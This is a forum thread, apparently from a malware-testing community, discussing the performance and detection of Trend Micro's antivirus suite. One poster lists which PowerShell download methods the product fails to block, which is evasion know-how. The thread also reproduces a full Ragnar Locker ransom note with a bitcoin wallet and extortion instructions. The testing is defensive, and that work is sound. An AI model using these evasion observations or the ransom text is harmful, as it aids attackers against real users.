Updates Trend Micro Improvements

[McMcbrad]

Following the @JoeN test of Trend Micro, located here:

Video - League of Antivirus - Trend Micro Maximum Security 17.0.222 vs Malicious URLs, Phishing URLs, Malware Samples

Trend Micro Maximum Security 17.0.222 vs Malicious URLs, Phishing URLs, Malware Samples, Real-World Detection

malwaretips.com

I would like to share observations from Trend Micro I've made today:

I won't be talking about detection, with TM this is a bit above average, but not top.
They have however improved performance very seriously. I can see that there has been a software revamp, as the core services have changed.
There is a "Trend Micro Activity Data Service" and "Trend Micro Browser Exploit Detection", which are new. Most likely they have moved the code to new services to improve stability.

On idle, there was a constant 2-3% activity before, but now there is rarely any and it doesn't even reach 1%.

On app launch, before I've seen 30-40% CPU activity, now it varies between 5-10% and is only the first time you open an app. Disk usage goes up to 50-100 mb (my total read speed is about 1800).

On browsing CPU usage is less than 1%., which is amongst the lowest in the industry.

On scan, the CPU usage seems to have been limited to 20%.

The system overall feels very responsive and snappy with Trend Micro installed, which is again, different from before.

If any users have criticised TM for their performance before, it might be worth giving them a try now and see where they stand today.

I would also like to bring to your attention that *some* changes have been made to their engine, at least from a classification point of view. Before, most threats were having generic names, but today, it seems to be a bit more precise.

One nonsense I noticed is, when you download a file, it says there are no threats. 3-4 seconds after, it displays a message that it has removed the same file. This might be a bit confusing to users.

 

[sepik]

Yeah, i was beta tester of their v17 product and the beta was way faster then their previous v16. It's getting better and better in terms of lightness. Sure, its not so snappy than for example F-Secure, but its way better what it was a year ago. It's good against ransomware and scripts and its BB is very good. Because TM relies heavily on cloud, its offline detection is below average and for some reason with false positives, you need actually run the .exe twice before you can allow the file to run(via TM popup). Overall it's a solid product and i like it. It's installed one of my laptops.

 

[McMcbrad]

Yeah, i was beta tester of their v17 product and the beta was way faster then their previous v16. It's getting better and better in terms of lightness. Sure, its not so snappy than for example F-Secure, but its way better what it was a year ago. It's good against ransomware and scripts and its BB is very good. Because TM relies heavily on cloud, its offline detection is below average and for some reason with false positives, you need actually run the .exe twice before you can allow the file to run(via TM popup). Overall it's a solid product and i like it. It's installed one of my laptops.

I have today sent them some samples, I am curious how long it will take to process them. Sent them just few minutes ago via email and had to contact support, as they only allow business customers with valid product keys to submit via the official portal. Once I get a response or notice they are detected, I will post an update.

 

[McMcbrad]

It's good against ransomware and scripts

Following this statement I got very interested to play around with it and created few PowerShell loaders.
I found out that System.Net.WebClient is blocked entirely. Obfuscated or not, with browser agent or without, it is impossible to use it with Trend Micro on. This is the most popular method attackers use.
It's also blocked in .Net language for example if you embed it in a document and try to run it with cscript, wscript.

Invoke-WebRequest, cscript download and BITS are not blocked at all, unless if the domain is blacklisted. In that case Trend Micro blocks the download, but displays no message and leaves a 2 KB file.

 

[McMcbrad]

Contradicting to any logic I installed TM on a very slow PC, at the low end of the scale.
It's slow due to the HDD, which has a reading speed of ~20 megs/5400 RPM, long seek time.
Other than that, the PC has Pentium N3530 CPU @ 2.16 GhZ and 4 GB DDR3 RAM.
As HDD is at the beginning of software execution chain, everything else is slowed down. I decided to do that after I noticed very low disk activity from TM on my malware testing laptop.

It might seem like a madness to install AV that stands almost at the end of AV-Comparatives Performance scale, but due to the lack of constant updates/definitions and the cloud, it runs better with TM compared to other AVs.

It also starts faster, as TM updates are very infrequent and very small. With AVG and others, there was 20-30% CPU activity & 50-60% disk usage after system boot, whilst they perform their update process. Software launch, such as Chrome, which for that PC is like Photoshop feels faster than before (had McAfee and AVG on that laptop).

I haven't installed Password Manager and have turned off Ransomware Protection, as this PC is only used for watching TV and nothing else. It will hardly suffer a ransomware attack. Other than that, I haven't modified any settings.

TM might be a good choice for PCs with average CPU & RAM, but very mediocre HDD.

 

[McMcbrad]

The samples I submitted to Trend Micro 9:00 today are now detected. They may have been added earlier, but I checked just now (19:50).
Samples were fileless Agent Tesla.

 

[McMcbrad]

I managed to drive Trend Micro crazy.

I tested it against ransomware called RAGNAR_LOCKER (according to the note).

Spoiler: Note

Hello VGCARGO !

*****************************************************************************************************************

If you reading this message, then your network was PENETRATED and all of your files and data has been ENCRYPTED

by RAGNAR_LOCKER !

*****************************************************************************************************************

*********What happens with your system ?************

Your network was penetrated, all your files and backups was locked! So from now there is NO ONE CAN HELP YOU to get your files back, EXCEPT US.
You can google it, there is no CHANCES to decrypt data without our SECRET KEY.

But don't worry ! Your files are NOT DAMAGED or LOST, they are just MODIFIED. You can get it BACK as soon as you PAY.
We are looking only for MONEY, so there is no interest for us to steel or delete your information, it's just a BUSINESS $-)

HOWEVER you can damage your DATA by yourself if you try to DECRYPT by any other software, without OUR SPECIFIC ENCRYPTION KEY !!!

Also, all of your sensitive and private information were gathered and if you decide NOT to pay,
we will upload it for public view !

****

***********How to get back your files ?******

To decrypt all your files and data you have to pay for the encryption KEY :

BTC wallet for payment: 1BKK8bsFfG3YxTd3N15GxaYfHopoThXoY4
Amount to pay (in Bitcoin): 25

****

***********How much time you have to pay?**********

* You should get in contact with us within 2 days after you noticed the encryption to get a better price.

* The price would be increased by 100% (double price) after 14 Days if there is no contact made.

* The key would be completely erased in 21 day if there is no contact made or no deal made.
Some sensetive information stolen from the file servers would be uploaded in public or to re-seller.

****

***********What if files can't be restored ?******

To prove that we really can decrypt your data, we will decrypt one of your locked files !
Just send it to us and you will get it back FOR FREE.

The price for the decryptor is based on the network size, number of employees, annual revenue.
Please feel free to contact us for amount of BTC that should be paid.

****

! IF you don't know how to get bitcoins, we will give you advise how to exchange the money.


!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
! HERE IS THE SIMPLE MANUAL HOW TO GET CONTCAT WITH US !
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

1) Go to the official website of TOX messenger ( A New Kind of Instant Messaging )

2) Download and install qTOX on your PC, choose the platform ( Windows, OS X, Linux, etc. )

3) Open messenger, click "New Profile" and create profile.

4) Click "Add friends" button and search our contact

5) For identification, send to our support data from ---RAGNAR SECRET---

IMPORTANT ! IF for some reasons you CAN'T CONTACT us in qTOX, here is our reserve mailbox ( cargowelcome@protonmail.com ) send a message with a data from ---RAGNAR SECRET---



WARNING!

-Do not try to decrypt files with any third-party software (it will be damaged permanently)
-Do not reinstall your OS, this can lead to complete data loss and files cannot be decrypted. NEVER!
-Your SECRET KEY for decryption is on our server, but it will not be stored forever. DO NOT WASTE TIME !


***********************************************************************************

---RAGNAR SECRET---

---RAGNAR SECRET---

***********************************************************************************

It generated more than 1K detections from TM in a minute, but nothing could be encrypted. The detections came from the notes themselves.

 

[The Cog in the Machine]

Today I have re-visited TMMS and it is fast and so far I like it. Will see how it performs in the next days.

 

[McMcbrad]

Today I have re-visited TMMS and it is fast and so far I like it. Will see how it performs in the next days.

I like how their threat analysts respond to my submissions... I submit a threat and next day Smart Scan Agent Pattern, Program Inspection Pattern and Threat Correlation Pattern are all updated...
I feel special
I uploaded more than 100 scripts last night. I expect the updates today.
Plus, I like their Rik Ferguson as well. He is talented in the threats research field.

 

[The Cog in the Machine]

Contradicting to any logic I installed TM on a very slow PC, at the low end of the scale.
It's slow due to the HDD, which has a reading speed of ~20 megs/5400 RPM, long seek time.
Other than that, the PC has Pentium N3530 CPU @ 2.16 GhZ and 4 GB DDR3 RAM.
As HDD is at the beginning of software execution chain, everything else is slowed down. I decided to do that after I noticed very low disk activity from TM on my malware testing laptop.

It might seem like a madness to install AV that stands almost at the end of AV-Comparatives Performance scale, but due to the lack of constant updates/definitions and the cloud, it runs better with TM compared to other AVs.

It also starts faster, as TM updates are very infrequent and very small. With AVG and others, there was 20-30% CPU activity & 50-60% disk usage after system boot, whilst they perform their update process. Software launch, such as Chrome, which for that PC is like Photoshop feels faster than before (had McAfee and AVG on that laptop).

I haven't installed Password Manager and have turned off Ransomware Protection, as this PC is only used for watching TV and nothing else. It will hardly suffer a ransomware attack. Other than that, I haven't modified any settings.

TM might be a good choice for PCs with average CPU & RAM, but very mediocre HDD.

In TM settings there are two option regarding performance: one that says extra security and the other is extra performance. I wonder what option was activated. Maybe TM activates that differently on each system? On my system the extra security option is selected.

 

[McMcbrad]

In TM settings there are two option regarding performance: one that says extra security and the other is extra performance. I wonder what option was activated. Maybe TM activates that differently on each system? On my system the extra security option is selected.

I haven’t activated extra performance option, I have only disabled “Scan for Suspicious Files When Computer Starts” or something of this sort.
I have enabled folder shield now, as it doesn’t affect performance at all.

 

[The Cog in the Machine]

@McMcbrad does TM do as Eset and Kapsersky (adding their own certificate) to filter https traffic?

 

[Nagisa]

Waiting for its beta version to be released. This and the GData are the two programs I haven't installed on my computer yet and catched my interest.

 

[McMcbrad]

Waiting for its beta version to be released. This and the GData are the two programs I haven't installed on my computer yet and catched my interest.

The last version of TM was only released in Septmber... you'll have to wait for a while
However, let all users keep in mind that Trend Micro architecture is split on many components in 3 groups. Such architecture doesn't require major updates and upgrades to bring improvements.

Regarding the certificates, no. Trend Micro doesn't install these (at least I didn't see it).

 

[The Cog in the Machine]

Waiting for its beta version to be released. This and the GData are the two programs I haven't installed on my computer yet and catched my interest.

If you are talking about 2021 it was released in September.

 

[The Cog in the Machine]

Regarding the certificates, no. Trend Micro doesn't install these (at least I didn't see it).

So the extension is required to deliver protection?

 

[McMcbrad]

So the extension is required to deliver protection?

It is not required either, it's required for some additional functionalities such as Fraud Buster. Protection may be provided by the user mode hook.

 

[McMcbrad]

I managed to trigger a feature I haven't seen before:

I conducted the test with a Parrllax RAT sample, which is signed.

It doesn't mention what vulnerability has been exploited though.

 

[gery79]

nice feature

 

[blackice]

I managed to trigger a feature I haven't seen before:

View attachment 254063
I conducted the test with a Parrllax RAT sample, which is signed.

View attachment 254064
It doesn't mention what vulnerability has been exploited though.

You have a talent for getting people interested in trying different solutions. This is definitely on my radar now.